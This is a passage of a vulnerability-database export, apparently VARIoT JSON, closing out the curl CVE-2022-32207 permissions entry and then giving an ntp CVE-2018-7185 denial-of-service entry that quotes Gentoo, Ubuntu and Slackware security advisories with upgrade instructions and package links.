        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99464755",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU95292697",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU99752892",
        "trust": 0.8
      },
      {
        "db": "JVN",
        "id": "JVNVU94715153",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-166-12",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-075-01",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-194-01",
        "trust": 0.8
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-23-103-09",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "169318",
        "trust": 0.7
      },
      {
        "db": "PACKETSTORM",
        "id": "170166",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.6333",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3732",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.3117",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.2163",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2022.5300",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2023.3143",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022062927",
        "trust": 0.6
      },
      {
        "db": "CS-HELP",
        "id": "SB2022071142",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-424134",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170303",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170165",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "id": "VAR-202206-1963",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2025-04-24T23:12:57.157000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "HT213488 Apple\u00a0 Security update",
        "trust": 0.8,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "title": "curl Security vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=199973"
      },
      {
        "title": "Red Hat: Moderate: curl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226157 - Security Advisory"
      },
      {
        "title": "Ubuntu Security Notice: USN-5495-1: curl vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=USN-5495-1"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-32207"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-32207"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228840 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228841 - Security Advisory"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1875",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1875"
      },
      {
        "title": "Debian Security Advisories: DSA-5197-1 curl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d9b734e3e9b6712333c95a6263dead82"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-206",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-206"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-145",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-145"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/Live-Hack-CVE/CVE-2022-32207 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-276",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-840",
        "trust": 1.0
      },
      {
        "problemtype": "Inappropriate default permissions (CWE-276) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.6,
        "url": "https://hackerone.com/reports/1573634"
      },
      {
        "trust": 1.9,
        "url": "https://security.gentoo.org/glsa/202212-01"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20220915-0003/"
      },
      {
        "trust": 1.8,
        "url": "https://support.apple.com/kb/ht213488"
      },
      {
        "trust": 1.8,
        "url": "https://www.debian.org/security/2022/dsa-5197"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2022/oct/28"
      },
      {
        "trust": 1.8,
        "url": "http://seclists.org/fulldisclosure/2022/oct/41"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32207"
      },
      {
        "trust": 1.0,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.8,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/bev6br4mti3cewk2yu2hqzuw5fas3fey/"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99752892"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu94715153"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu99464755"
      },
      {
        "trust": 0.8,
        "url": "https://jvn.jp/vu/jvnvu95292697"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-075-01"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-103-09"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-166-12"
      },
      {
        "trust": 0.8,
        "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-23-194-01"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32206"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/167607/ubuntu-security-notice-usn-5495-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3143"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.2163"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022071142"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2023.3732"
      },
      {
        "trust": 0.6,
        "url": "https://www.cybersecurity-help.cz/vdb/sb2022062927"
      },
      {
        "trust": 0.6,
        "url": "https://support.apple.com/en-us/ht213488"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/169318/debian-security-advisory-5197-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/168174/red-hat-security-advisory-2022-6157-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/curl-privilege-escalation-via-cookies-alt-svc-hsts-file-permissions-38672"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.5300"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/170166/red-hat-security-advisory-2022-8840-01.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.6333"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2022-32207/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2022.3117"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32208"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32205"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-32221"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-32207"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-32206"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-32208"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/errata/rhsa-2022:6157"
      },
      {
        "trust": 0.2,
        "url": "https://ubuntu.com/security/notices/usn-5495-1"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27782"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27776"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22576"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27781"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22945"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27774"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27775"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22946"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22947"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28614"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-23943"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-22721"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-26377"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30522"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-31813"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-42915"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28615"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-42916"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22721"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-35252"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-31813"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-2068"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28614"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-28330"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28615"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-28330"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26377"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-1292"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-23943"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30522"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-32221"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/276.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2022-32207"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.74.0-1.3ubuntu2.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.68.0-1ubuntu2.12"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.81.0-1ubuntu1.3"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/curl/7.58.0-2ubuntu3.19"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22922"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27779"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-30115"
      },
      {
        "trust": 0.1,
        "url": "https://security.gentoo.org/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35260"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22926"
      },
      {
        "trust": 0.1,
        "url": "https://bugs.gentoo.org."
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-27780"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-35252"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42916"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-42915"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22923"
      },
      {
        "trust": 0.1,
        "url": "https://creativecommons.org/licenses/by-sa/2.5"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40674"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40303"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-40304"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2022-37434"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22898"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-22924"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/curl"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2022:8840"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2022-07-07T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "date": "2022-07-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "date": "2023-09-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "date": "2022-06-28T15:26:16",
        "db": "PACKETSTORM",
        "id": "167607"
      },
      {
        "date": "2022-12-19T13:48:31",
        "db": "PACKETSTORM",
        "id": "170303"
      },
      {
        "date": "2022-12-08T21:28:21",
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "date": "2022-08-25T15:27:31",
        "db": "PACKETSTORM",
        "id": "168174"
      },
      {
        "date": "2022-08-28T19:12:00",
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "date": "2022-12-08T21:28:44",
        "db": "PACKETSTORM",
        "id": "170166"
      },
      {
        "date": "2022-06-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "date": "2022-07-07T13:15:08.403000",
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULHUB",
        "id": "VHN-424134"
      },
      {
        "date": "2023-01-05T00:00:00",
        "db": "VULMON",
        "id": "CVE-2022-32207"
      },
      {
        "date": "2023-09-26T06:16:00",
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      },
      {
        "date": "2023-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      },
      {
        "date": "2025-04-23T18:15:53.880000",
        "db": "NVD",
        "id": "CVE-2022-32207"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "169318"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "curl\u00a0 Vulnerability regarding improper default permissions in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2022-015269"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202206-2569"
      }
    ],
    "trust": 0.6
  }
}

VAR-201803-1822

Vulnerability from variot - Updated: 2025-01-15 21:25

The protocol engine in ntp 4.2.6 before 4.2.8p11 allows a remote attackers to cause a denial of service (disruption) by continually sending a packet with a zero-origin timestamp and source IP address of the "other side" of an interleaved association causing the victim ntpd to reset its association. ntp Contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition, denying service to legitimate users. NTP version 4.2.6 prior to 4.2.8p11 are vulnerable. protocol engine is one of the protocol engines. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. This issue only affected Ubuntu 17.10 and Ubuntu 18.04 LTS. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201805-12

                                       https://security.gentoo.org/

Severity: Normal Title: NTP: Multiple vulnerabilities Date: May 26, 2018 Bugs: #649612 ID: 201805-12

Synopsis

Multiple vulnerabilities have been found in NTP, the worst of which could lead to remote code execution.

Affected packages

-------------------------------------------------------------------
 Package              /     Vulnerable     /            Unaffected
-------------------------------------------------------------------

1 net-misc/ntp < 4.2.8_p11 >= 4.2.8_p11

Description

Multiple vulnerabilities have been discovered in NTP. Please review the CVE identifiers referenced below for details.

Workaround

There is no known workaround at this time.

Resolution

All NTP users should upgrade to the latest version:

# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/ntp-4.2.8_p11"

References

[ 1 ] CVE-2018-7170 https://nvd.nist.gov/vuln/detail/CVE-2018-7170 [ 2 ] CVE-2018-7182 https://nvd.nist.gov/vuln/detail/CVE-2018-7182 [ 3 ] CVE-2018-7183 https://nvd.nist.gov/vuln/detail/CVE-2018-7183 [ 4 ] CVE-2018-7184 https://nvd.nist.gov/vuln/detail/CVE-2018-7184 [ 5 ] CVE-2018-7185 https://nvd.nist.gov/vuln/detail/CVE-2018-7185

Availability

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

https://security.gentoo.org/glsa/201805-12

Concerns?

License

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5 . ========================================================================== Ubuntu Security Notice USN-3707-2 January 23, 2019

ntp vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in NTP.

Software Description: - ntp: Network Time Protocol daemon and utility programs

Details:

USN-3707-1 and USN-3349-1 fixed several vulnerabilities in NTP. This update provides the corresponding update for Ubuntu 12.04 ESM.

Original advisory details:

Miroslav Lichvar discovered that NTP incorrectly handled certain spoofed addresses when performing rate limiting. (CVE-2016-7426)

Matthew Van Gundy discovered that NTP incorrectly handled certain crafted broadcast mode packets. (CVE-2016-7427, CVE-2016-7428)

Matthew Van Gundy discovered that NTP incorrectly handled certain control mode packets. A remote attacker could use this issue to set or unset traps. (CVE-2016-9310)

Matthew Van Gundy discovered that NTP incorrectly handled the trap service. (CVE-2016-9311)

It was discovered that the NTP legacy DPTS refclock driver incorrectly handled the /dev/datum device. (CVE-2017-6462)

It was discovered that NTP incorrectly handled certain invalid settings in a :config directive. A remote authenticated user could possibly use this issue to cause NTP to crash, resulting in a denial of service. (CVE-2017-6463)

Michael Macnair discovered that NTP incorrectly handled certain responses. A remote attacker could possibly use this issue to execute arbitrary code. (CVE-2018-7183)

Miroslav Lichvar discovered that NTP incorrectly handled certain zero-origin timestamps. (CVE-2018-7185)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 ESM: ntp 1:4.2.6.p3+dfsg-1ubuntu3.12

In general, a standard system update will make all the necessary changes.

References: https://usn.ubuntu.com/usn/usn-3707-2 https://usn.ubuntu.com/usn/usn-3707-1 CVE-2016-7426, CVE-2016-7427, CVE-2016-7428, CVE-2016-9310, CVE-2016-9311, CVE-2017-6462, CVE-2017-6463, CVE-2018-7183, CVE-2018-7185 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

[slackware-security] ntp (SSA:2018-060-02)

New ntp packages are available for Slackware 14.0, 14.1, 14.2, and -current to fix security issues.

Here are the details from the Slackware 14.2 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz: Upgraded. This release addresses five security issues in ntpd: * LOW/MEDIUM: Sec 3012 / CVE-2016-1549 / VU#961909: Sybil vulnerability: ephemeral association attack. While fixed in ntp-4.2.8p7, there are significant additional protections for this issue in 4.2.8p11. Reported by Matt Van Gundy of Cisco. * INFO/MEDIUM: Sec 3412 / CVE-2018-7182 / VU#961909: ctl_getitem(): buffer read overrun leads to undefined behavior and information leak. Reported by Yihan Lian of Qihoo 360. * LOW: Sec 3415 / CVE-2018-7170 / VU#961909: Multiple authenticated ephemeral associations. Reported on the questions@ list. * LOW: Sec 3453 / CVE-2018-7184 / VU#961909: Interleaved symmetric mode cannot recover from bad state. Reported by Miroslav Lichvar of Red Hat. * LOW/MEDIUM: Sec 3454 / CVE-2018-7185 / VU#961909: Unauthenticated packet can reset authenticated interleaved association. Reported by Miroslav Lichvar of Red Hat. For more information, see: http://support.ntp.org/bin/view/Main/SecurityNotice#February_2018_ntp_4_2_8p11_NTP_S https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1549 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7182 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7184 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7185 ( Security fix ) +--------------------------+

Where to find the new packages: +-----------------------------+

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p11-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p11-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p11-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2: ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p11-i586-1_slack14.2.txz

